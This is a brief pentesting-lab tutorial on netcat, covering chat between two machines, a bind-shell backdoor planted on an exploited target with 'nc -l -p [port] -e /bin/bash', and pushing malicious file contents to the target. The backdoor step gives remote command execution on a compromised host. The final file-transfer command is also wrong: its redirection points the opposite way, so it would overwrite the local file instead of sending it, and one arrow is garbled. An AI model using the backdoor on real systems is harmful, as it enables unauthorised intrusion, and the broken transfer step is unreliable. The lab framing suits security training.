Netcat is a simple UNIX utility which reads and writes data across network connections, using TCP or UDP protocol. But it can also be used for VAPT purpose as follows:

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

• Target system: any Linux or Windows

In Kali Linux --> Terminal

1. Lan chatting

Creating listener on target

~# nc –l –p [port number]

Here,

-l --> listener

Making connection to listener of target

~# nc [IP address of target] [port number]

Now you can chat in between these two systems. You can stop this connection by pressing ctrl+c.

2. Opening command shell listener i.e. creating a backdoor on target after successfully exploiting the target and getting its shell.

On target system

~# nc –l –p [port number] –e /bin/bash

Here,

-e --> execute

/bin/bash à Linux shell (same as command prompt in Windows)

On attacker system

~# nc [IP address of target] [port number]

Now you can run any command on target from attacker system.

3. Sending (malicious) contents of the file to target system.

On target system

~# nc –l –p [port number] > [filename]

On attacker system

~# nc [IP address of target] [port number] > [path of the malicious file whose contents to be transferred]